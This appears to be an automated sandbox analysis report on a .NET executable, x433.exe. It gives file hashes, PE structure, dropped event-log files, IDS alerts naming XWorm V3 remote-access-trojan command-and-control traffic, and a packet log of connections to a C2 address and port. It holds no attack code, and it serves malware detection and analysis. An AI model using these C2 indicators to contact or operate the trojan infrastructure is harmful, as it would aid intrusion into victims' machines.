                                                SHA-256:1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
                                                SHA-512:E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
                                                Malicious:false
                                                Preview:ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.371963431522011
                                                Encrypted:false
                                                SSDEEP:384:exhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8R+PRdR3BZ:exA8nPLGblj
                                                MD5:39B514BBAD76965278510DE83BB7BEC4
                                                SHA1:4EA35C954C8504332B77AB53924E67DEC887B1D6
                                                SHA-256:9E6C6B55E25493653B22C7839F7635F819F6767CE1596573AE21BFD7BD71A83C
                                                SHA-512:F9A51AAA07762340F260BA7BEB3A84974F5D1935EE43EA07C5AEF8B2A0D8D7D834A2B85C7D8DF6B6D1EB44948FB0FE69B7C08A905865D6B241A4AC1FAD40C4E6
                                                Malicious:false
                                                Preview:ElfChnk.............................................b.6.....................................................................!..F.....................y.......x..N...........=............................................y..................}y..3...........................................c......xb..f...h.......lc..?.......................h........c......M.......M...F...9c..............................................Qb..............................................A.......i.......................&............x..**..(...........~.n............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.273338343434408
                                                Encrypted:false
                                                SSDEEP:384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
                                                MD5:C37372EB51AEDB4552CB839C7294403A
                                                SHA1:7B7C408D72B084CE36AA6B623AC6B907FD21D569
                                                SHA-256:C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
                                                SHA-512:69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
                                                Malicious:false
                                                Preview:ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.231195890775603
                                                Encrypted:false
                                                SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
                                                MD5:3365A34953FD7B16667108A049B64DA5
                                                SHA1:C72421A58E063D64072152344B266F8306A78702
                                                SHA-256:AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
                                                SHA-512:A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
                                                Malicious:false
                                                Preview:ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.350823347127061
                                                Encrypted:false
                                                SSDEEP:384:eh+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBwl:eOqabeGTnbuSxPgw
                                                MD5:06692B0E4FE9CDCB23C9491FE1549F5D
                                                SHA1:D24AF44F59A4C5213B0B71F0D7356A343E425D29
                                                SHA-256:2F1090B70BC8077683A7535409A040CDED19862D75263A0AAC026A8926142319
                                                SHA-512:2FC82225B53D9B18C0AAAE036711351A2EF393AAF683D530D7D059350E20C9E64ED5F90AC82EFB97241A8A54974ED93C9B6620B605C8F0BF50F065089379353C
                                                Malicious:false
                                                Preview:ElfChnk.....................................H...x....j......................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.421206160086997
                                                Encrypted:false
                                                SSDEEP:384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
                                                MD5:67CAD90771EBC0BD20736201D89C1586
                                                SHA1:EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
                                                SHA-256:7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
                                                SHA-512:27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
                                                Malicious:false
                                                Preview:ElfChnk.........l...............l...............@....^.....................................................................+t].................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......Q8.......................................................6......................**...............yM..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):68120
                                                Entropy (8bit):4.326642531839143
                                                Encrypted:false
                                                SSDEEP:384:kGFRFGFR0owonS6cWNfoLSbdsLSvnQYoxMtg6Wo9MtxLo9MtMozonuoxNo/Vo1+B:bA4a1ZGg6ULiZP
                                                MD5:98CC25B4C7E2603576D8A5E492E7DF93
                                                SHA1:F9996050914E79CA0D83E7F820405747993E5881
                                                SHA-256:AF14598F079DA7377AA3CBAA413CB933308A8440EC5FBF1D8AE5B897A87680CA
                                                SHA-512:E6260E0D530CC27CA33281B750110C4F2BEC7FAD34B0AA8EBE9786D8BFF8B9CBF26B50066E2E87BCDD288A3579ADDEB572413518DD386E42954586BC3C8BC3F9
                                                Malicious:false
                                                Preview:ElfChnk.................U.......U....................2t.....................................................................`.H.....................s...h...............N...=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:...........................................................&...................................................................................**......U.........U...........Wt.&........Wt...wX..9Ck?5.?.......A..3...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....\...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):74928
                                                Entropy (8bit):4.36742112325646
                                                Encrypted:false
                                                SSDEEP:384:HFRbLgxFRbLgzLEZopT2EoWDpWTHdD+pVaIna0EaiN8H8T8+HeJvGAgXZIpURCO2:l2FlnLmLQXHmtpJnqiNHpzoQpIWK+
                                                MD5:8A10580745FB8D4982F583AA7B6083D2
                                                SHA1:35F1C49A7EA27366F1ACBC6923F502212EDF0127
                                                SHA-256:94ABE2CF136CB913A166CA8328B24A8C4945FF3D147A71485217E789BD4B8B90
                                                SHA-512:53C6310467DB773750CCB3F5AC28259B762A606664F34DA9074A3ADCC7E31BBFAB276A06EAF46028E30304F83983F33AF7BB663E83FB86FCB59C4582AB06497E
                                                Malicious:false
                                                Preview:ElfChnk.................m.......r...................`.'.....................................................................+..J....................s...h...............N...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...........................................................................................................................&...................**......m.........U...........i.e&........i.e.t.Q...H.C.A;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):101424
                                                Entropy (8bit):3.7560696119552426
                                                Encrypted:false
                                                SSDEEP:3072:nV7jJtV7jJNV7jJAV7jJtV7jJNV7jJLV7jJFV7jJ:nV7jJtV7jJNV7jJAV7jJtV7jJNV7jJL9
                                                MD5:83C1685CA57A9A68110329C2E1C775AA
                                                SHA1:3613D69E0B57096306CB79E6231B02DA56798510
                                                SHA-256:082C957A6A2522C9EED6DACB22F0A50010408B9B9339E42CA962B03EE4C25AD0
                                                SHA-512:A0DE87623B515FE00803789DFACC3BF43459021EBF21889731BC203399E45E4E3AC048DBDCF60E6671CE4E0A810962AEDC1D43F58F1ECA7B70C2A7E75B0CC31A
                                                Malicious:false
                                                Preview:ElfChnk.................~...................._..0....7.W......................................................................xg............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............................................&.......................................................................**..P1..~........A.Y...........B.&........B...._j..d.:Ad........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.994440290930161
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:x433.exe
                                                File size:780'288 bytes
                                                MD5:148ec472df90b0fb274c3ce2ad2e811f
                                                SHA1:378ba02b08494b36ff5a2674cf99eba6c7025d6a
                                                SHA256:a08b846be9052a2614ef6a6920260d465774f5da9926f6d08449a2e4eb27b787
                                                SHA512:ab6764b598d538bc726a1e0baf02c8c4a2ccdedf77ff6b3ee63d1e27c0a05e13423142b86f38afbd9462c0d90b5c3a9963a30e110145aca455ffa5403375c5b1
                                                SSDEEP:12288:0sjApTtnb0TbQxMM90CL7VmADH2eJGCOTJfVXwAfIXZqPtbxZWdezgrrNo02UBYW:djuTt4TbQRjDH2eJQTNqcWOVZK1y02UH
                                                TLSH:B8F433785B692367D66EE6B900727E21DF53EC3B4789769A04182F162C50ECCA03F793
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@.f................................. ........@.. .......................@............@................................
                                                Icon Hash:90cececece8e8eb0
                                                Entrypoint:0x4bfc1e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x668140BD [Sun Jun 30 11:25:49 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xbfbc80x53.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x4d0.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xbdc240xbde001a5688bf04db51adc70628236eb48478False0.9949712495885451data7.996675267651461IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0xc00000x4d00x60053504d962abeba92efaa03311efac60eFalse0.3736979166666667data3.7040232107609024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xc20000xc0x200ee9efb4886a8adefe345e5c100203312False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_VERSION0xc00a00x23cdata0.4755244755244755
                                                RT_MANIFEST0xc02e00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                DLLImport
                                                mscoree.dll_CorExeMain
                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                07/02/24-00:31:31.600432TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound4973136125192.168.2.4147.185.221.20
                                                07/02/24-00:31:12.392608TCP2853191ETPRO TROJAN Win32/XWorm V3 CnC Command - savePlugin Inbound3612549731147.185.221.20192.168.2.4
                                                07/02/24-00:31:15.100229TCP2852923ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973236125192.168.2.4147.185.221.20
                                                07/02/24-00:31:12.013436TCP2853192ETPRO TROJAN Win32/XWorm V3 CnC Command - sendPlugin Outbound4973136125192.168.2.4147.185.221.20
                                                07/02/24-00:33:13.525735TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes3612549731147.185.221.20192.168.2.4
                                                07/02/24-00:31:15.100229TCP2852873ETPRO TROJAN Win32/XWorm CnC PING Command Outbound M24973236125192.168.2.4147.185.221.20
                                                07/02/24-00:32:52.687393TCP2852874ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M23612549731147.185.221.20192.168.2.4
                                                07/02/24-00:33:13.526536TCP2852923ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973136125192.168.2.4147.185.221.20
                                                07/02/24-00:31:15.149071TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes3612549732147.185.221.20192.168.2.4
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jul 2, 2024 00:31:03.820808887 CEST4973080192.168.2.4208.95.112.1
                                                Jul 2, 2024 00:31:03.825613976 CEST8049730208.95.112.1192.168.2.4
                                                Jul 2, 2024 00:31:03.825692892 CEST4973080192.168.2.4208.95.112.1
                                                Jul 2, 2024 00:31:03.826421976 CEST4973080192.168.2.4208.95.112.1
                                                Jul 2, 2024 00:31:03.831191063 CEST8049730208.95.112.1192.168.2.4
                                                Jul 2, 2024 00:31:04.292587996 CEST8049730208.95.112.1192.168.2.4
                                                Jul 2, 2024 00:31:04.334342003 CEST4973080192.168.2.4208.95.112.1
                                                Jul 2, 2024 00:31:05.697464943 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:05.703119993 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:05.703509092 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:05.752739906 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:05.757488012 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:11.456789970 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:11.506366968 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:12.013436079 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:12.018239975 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.392607927 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.392748117 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.392822981 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:12.397713900 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.397742987 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.397785902 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:12.402590036 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.402720928 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.402765036 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:12.408546925 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.408561945 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.408603907 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:12.413609028 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.413635015 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.413678885 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:12.418541908 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.418596029 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.418651104 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:12.487016916 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.537492990 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:12.628870010 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:12.633656979 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.633728981 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:12.688009977 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:12.693015099 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.709578037 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:12.715132952 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.818953037 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:12.825592995 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:12.928343058 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:12.933353901 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:13.038012981 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:13.043088913 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:13.147437096 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:13.153187990 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:13.257433891 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:13.262409925 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:13.366189957 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:13.371417999 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:13.475655079 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:13.480638027 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:13.595983982 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:13.781893969 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:13.783298969 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:13.788153887 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:13.818958998 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:13.824080944 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:13.889915943 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:13.928525925 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:13.933818102 CEST3612549732147.185.221.20192.168.2.4
